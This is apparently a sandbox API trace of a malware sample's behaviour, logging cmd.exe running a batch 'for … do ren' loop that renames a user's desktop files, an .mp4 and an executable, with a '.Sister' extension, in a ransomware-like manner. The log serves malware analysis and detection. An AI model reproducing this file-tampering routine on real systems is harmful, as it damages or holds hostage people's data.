lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0134.078] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0134.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.078] GetFileType (hFile=0x50) returned 0x2 [0134.078] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0134.078] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0134.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.273] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0134.436] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0134.436] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.436] GetFileType (hFile=0x50) returned 0x2 [0134.436] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0134.436] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0134.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.521] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0134.658] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0134.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.659] GetFileType (hFile=0x50) returned 0x2 [0134.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0134.662] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0134.757] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.757] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0134.808] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.808] GetFileType (hFile=0x50) returned 0x2 [0134.809] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0134.809] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0134.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.964] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d0f980*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d0f980*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0135.030] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"2QVQiUvIc2zuhpxx-t.mp4.Sister\" \"2QVQiUvIc2zuhpxx-t.bat\" ") returned 58 [0135.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0135.035] GetFileType (hFile=0x50) returned 0x2 [0135.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0135.035] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0135.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0135.086] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0135.178] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0135.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0135.180] GetFileType (hFile=0x50) returned 0x2 [0135.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0135.180] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0135.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0135.265] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0135.351] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0135.447] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0135.447] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0135.448] malloc (_Size=0xffce) returned 0x21ed8f10840 [0135.448] ??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0135.449] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0135.449] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0135.449] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0135.449] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0135.449] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0135.449] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0135.449] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0135.449] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0135.449] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0135.449] ??_V@YAXPEAX@Z () returned 0x1 [0135.449] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed8cdc150 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdc150, Size=0x84) returned 0x21ed8cdc150 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdc150) returned 0x84 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed8cee800 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed8cdc1f0 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdc1f0, Size=0x84) returned 0x21ed8cdc1f0 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdc1f0) returned 0x84 [0135.450] malloc (_Size=0xffce) returned 0x21ed8f10840 [0135.450] ??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ca00 [0135.450] GetProcessHeap () returned 0x21ed8c70000 [0135.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdc290 [0135.450] _wcsicmp (_String1="2QVQiUvIc2zuhpxx-t.mp4", _String2=".") returned 4 [0135.450] _wcsicmp (_String1="2QVQiUvIc2zuhpxx-t.mp4", _String2="..") returned 4 [0135.451] GetFileAttributesW (lpFileName="2QVQiUvIc2zuhpxx-t.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\2qvqiuvic2zuhpxx-t.mp4")) returned 0x20 [0135.451] GetProcessHeap () returned 0x21ed8c70000 [0135.451] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d0fba0 [0135.453] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d0fbb0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0135.453] SetErrorMode (uMode=0x0) returned 0x0 [0135.453] SetErrorMode (uMode=0x1) returned 0x0 [0135.453] GetFullPathNameW (in: lpFileName="2QVQiUvIc2zuhpxx-t.mp4", nBufferLength=0x7fe7, lpBuffer=0x21ed8f10840, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4", lpFilePart=0xa6cf4fd660*="2QVQiUvIc2zuhpxx-t.mp4") returned 0x2e [0135.454] SetErrorMode (uMode=0x0) returned 0x1 [0135.454] GetProcessHeap () returned 0x21ed8c70000 [0135.454] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdc500 [0135.454] _wcsicmp (_String1="2QVQiUvIc2zuhpxx-t.mp4", _String2=".") returned 4 [0135.454] _wcsicmp (_String1="2QVQiUvIc2zuhpxx-t.mp4", _String2="..") returned 4 [0135.454] GetFileAttributesW (lpFileName="2QVQiUvIc2zuhpxx-t.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\2qvqiuvic2zuhpxx-t.mp4")) returned 0x20 [0135.455] ??_V@YAXPEAX@Z () returned 0x1 [0135.455] malloc (_Size=0xffce) returned 0x21ed8f10840 [0135.455] ??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0135.455] malloc (_Size=0xffce) returned 0x21ed8f20820 [0135.455] ??_V@YAXPEAX@Z () returned 0x21ed8f20820 [0135.456] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\2qvqiuvic2zuhpxx-t.mp4")) returned 0x20 [0135.456] malloc (_Size=0xffce) returned 0x21ed9080080 [0135.457] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0135.458] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4", fInfoLevelId=0x1, lpFindFileData=0x21ed8cdc2a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8cdc2a0) returned 0x21ed8c7cc40 [0135.458] malloc (_Size=0xffce) returned 0x21ed9090060 [0135.458] ??_V@YAXPEAX@Z () returned 0x21ed9090060 [0135.459] ??_V@YAXPEAX@Z () returned 0x1 [0135.459] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\2qvqiuvic2zuhpxx-t.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\2QVQiUvIc2zuhpxx-t.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\2qvqiuvic2zuhpxx-t.mp4.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0135.500] FindNextFileW (in: hFindFile=0x21ed8c7cc40, lpFindFileData=0x21ed8cdc2a0 | out: lpFindFileData=0x21ed8cdc2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c39890, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x4e3ff9f0, ftLastAccessTime.dwHighDateTime=0x1d5e58e, ftLastWriteTime.dwLowDateTime=0x4e3ff9f0, ftLastWriteTime.dwHighDateTime=0x1d5e58e, nFileSizeHigh=0x0, nFileSizeLow=0x9873, dwReserved0=0x0, dwReserved1=0x0, cFileName="2QVQiUvIc2zuhpxx-t.mp4", cAlternateFileName="")) returned 0 [0135.502] GetLastError () returned 0x12 [0135.502] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0135.502] ??_V@YAXPEAX@Z () returned 0x1 [0135.503] ??_V@YAXPEAX@Z () returned 0x1 [0135.503] ??_V@YAXPEAX@Z () returned 0x1 [0135.504] ??_V@YAXPEAX@Z () returned 0x1 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ca60 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95480, Size=0x16) returned 0x21ed8c95ae0 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ae0) returned 0x16 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8cdc770 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdc770, Size=0xb2) returned 0x21ed8cdc770 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.505] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdc770) returned 0xb2 [0135.505] GetProcessHeap () returned 0x21ed8c70000 [0135.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d1fb90 [0135.506] GetProcessHeap () returned 0x21ed8c70000 [0135.506] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d1fb90, Size=0x30) returned 0x21ed8d1fb90 [0135.506] GetProcessHeap () returned 0x21ed8c70000 [0135.506] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d1fb90) returned 0x30 [0135.506] GetProcessHeap () returned 0x21ed8c70000 [0135.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d1fbd0 [0135.506] malloc (_Size=0x1ff9c) returned 0x21ed8f10840 [0135.509] GetProcessHeap () returned 0x21ed8c70000 [0135.509] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c967c0 [0135.509] GetProcessHeap () returned 0x21ed8c70000 [0135.509] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96ac0 [0135.509] ??_V@YAXPEAX@Z () returned 0x1 [0135.511] malloc (_Size=0x1ff9c) returned 0x21ed8f10840 [0135.514] GetProcessHeap () returned 0x21ed8c70000 [0135.514] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96dc0 [0135.515] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed8f10840, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0135.515] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cdc240, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0135.515] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0135.515] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cdc240, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0135.515] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0135.515] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7b599812, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7b599812, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cdc240, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cf40 [0135.515] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0135.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xd8cdc240, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8c7cc40 [0135.516] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0135.516] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0135.516] malloc (_Size=0x1ff9c) returned 0x21ed9080080 [0135.517] ??_V@YAXPEAX@Z () returned 0x21ed9080080 [0135.518] GetProcessHeap () returned 0x21ed8c70000 [0135.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8cdc840 [0135.518] ??_V@YAXPEAX@Z () returned 0x1 [0135.518] ??_V@YAXPEAX@Z () returned 0x1 [0135.590] GetProcessHeap () returned 0x21ed8c70000 [0135.590] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d1fbd0, Size=0x490) returned 0x21ed8d1fbd0 [0135.590] GetProcessHeap () returned 0x21ed8c70000 [0135.590] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d1fbd0) returned 0x490 [0135.590] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0135.590] _get_osfhandle (_FileHandle=1) returned 0x50 [0135.590] GetFileType (hFile=0x50) returned 0x2 [0135.590] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0135.590] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0135.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0135.696] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0135.926] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0135.927] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0135.927] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0135.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0135.927] GetFileType (hFile=0x50) returned 0x2 [0135.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0135.927] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0136.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.148] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0136.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.315] GetFileType (hFile=0x50) returned 0x2 [0136.315] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0136.315] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0136.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.476] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d1fba0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d1fba0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0136.612] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0136.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.612] GetFileType (hFile=0x50) returned 0x2 [0136.612] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0136.612] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0136.690] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.690] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0137.299] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0137.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0137.302] GetFileType (hFile=0x50) returned 0x2 [0137.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0137.302] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0137.405] _get_osfhandle (_FileHandle=1) returned 0x50 [0137.405] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0137.448] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0137.547] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0137.547] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0137.548] malloc (_Size=0xffce) returned 0x21ed8f10840 [0137.549] ??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0137.549] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0137.549] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0137.549] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0137.549] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0137.549] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0137.549] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0137.550] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0137.550] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0137.550] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0137.550] ??_V@YAXPEAX@Z () returned 0x1 [0137.550] GetProcessHeap () returned 0x21ed8c70000 [0137.550] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cdc8c0 [0137.550] GetProcessHeap () returned 0x21ed8c70000 [0137.550] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdc8c0, Size=0x130) returned 0x21ed8cdc8c0 [0137.550] GetProcessHeap () returned 0x21ed8c70000 [0137.550] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdc8c0) returned 0x130 [0137.550] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0137.550] malloc (_Size=0xffce) returned 0x21ed8f10840 [0137.550] ??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0137.550] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0137.550] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed8f10840, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0137.553] ??_V@YAXPEAX@Z () returned 0x1 [0137.553] GetProcessHeap () returned 0x21ed8c70000 [0137.553] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8cdca00 [0137.554] GetProcessHeap () returned 0x21ed8c70000 [0137.554] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cdcb40 [0137.554] GetProcessHeap () returned 0x21ed8c70000 [0137.554] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdcb40, Size=0x130) returned 0x21ed8cdcb40 [0137.554] GetProcessHeap () returned 0x21ed8c70000 [0137.554] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdcb40) returned 0x130 [0137.554] malloc (_Size=0xffce) returned 0x21ed8f10840 [0137.554] 